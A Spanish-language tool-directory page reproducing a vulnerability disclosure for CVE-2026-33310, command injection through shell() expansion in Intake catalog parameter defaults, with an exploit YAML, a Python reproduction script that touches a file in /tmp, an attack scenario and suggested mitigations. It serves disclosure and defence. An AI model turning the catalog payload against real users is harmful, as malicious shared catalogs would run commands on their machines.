Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33310 — Prueba de concepto que demuestra la inyección de comandos mediante la expansión shell() en los valores predeterminados de parámetros de catálogos Intake, con YAML de explotación y script de reproducción. | Kitploit
Herramientas/GitHubGitHub/redyank/cve-2026-33310
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónSeguridad WebComando y Control
GitHubredyank/cve-2026-33310

CVE-2026-33310

Prueba de concepto que demuestra la inyección de comandos mediante la expansión shell() en los valores predeterminados de parámetros de catálogos Intake, con YAML de explotación y script de reproducción.

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33310

CVE-2026-33310 (Inyección de Comandos mediante la Expansión shell() en Valores por Defecto de Parámetros)

Resumen

La sintaxis shell() dentro de los valores por defecto de parámetros parece expandirse automáticamente durante el proceso de análisis del catálogo. Si un catálogo contiene un valor por defecto de parámetro como shell(), el comando podría ejecutarse cuando se accede a la fuente del catálogo. Esto significa que si un usuario carga un YAML de catálogo malicioso, los comandos incrustados podrían ejecutarse en el sistema host. Este comportamiento podría clasificarse potencialmente como CWE-78: Inyección de Comandos del Sistema Operativo / Expansión Insegura de Shell.

Detalles

El problema parece originarse en cómo se expanden los valores por defecto de parámetros cuando se accede a una fuente de catálogo.

Durante la carga del catálogo y el acceso a la fuente:

Intake resuelve los valores por defecto de parámetros La función responsable de expandir los valores por defecto procesa la sintaxis shell() La expresión shell() desencadena la ejecución de un subproceso Debido a que esto ocurre durante la evaluación del catálogo, el comando podría ejecutarse antes de que el usuario interactúe explícitamente con el propio conjunto de datos.

La lógica afectada parece involucrar:

root@kitploit:~
expand_defaults()

y mecanismos relacionados de análisis de parámetros.

PoC

exploit.yaml

root@kitploit:~
metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "Probando la expansión de shell en parámetros"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "Parámetro de Prueba"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

root@kitploit:~
import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] El archivo de prueba existe antes: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Accediendo a la fuente...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Error durante la ejecución: {e}")

if os.path.exists(PROOF_FILE):
    print(f" Ejecución de comando confirmada, Encontrado: {PROOF_FILE}")
else:
    print("La ejecución del comando no ocurrió.")

Escenario de Ataque

Un posible escenario de ataque podría ser:

  1. Un atacante publica un archivo YAML de catálogo Intake malicioso
  2. La víctima descarga o carga el catálogo
  3. La víctima accede a una entrada de fuente en el catálogo
  4. Los valores por defecto de parámetros se expanden
  5. La expresión shell() desencadena la ejecución del comando incrustado

Impacto

Si se confirma que este comportamiento no es intencionado, un atacante podría distribuir un archivo de catálogo malicioso mediante:

  • Repositorios Git
  • Conjuntos de datos compartidos
  • URLs
  • Flujos de trabajo de ciencia de datos
  • Cualquier usuario que cargue el catálogo podría ejecutar comandos sin saberlo con sus privilegios de usuario local.

Recomendación

Las posibles mitigaciones podrían incluir:

  • Deshabilitar la expansión shell() por defecto
  • Requerir una marca explícita de aceptación (por ejemplo, allow_shell=True)
  • Restringir la ejecución de shell para catálogos cargados desde fuentes no confiables Por favor, hágame saber si se necesita información adicional o pruebas. Estoy encantado de ayudar con más análisis o validación.
Descargar herramienta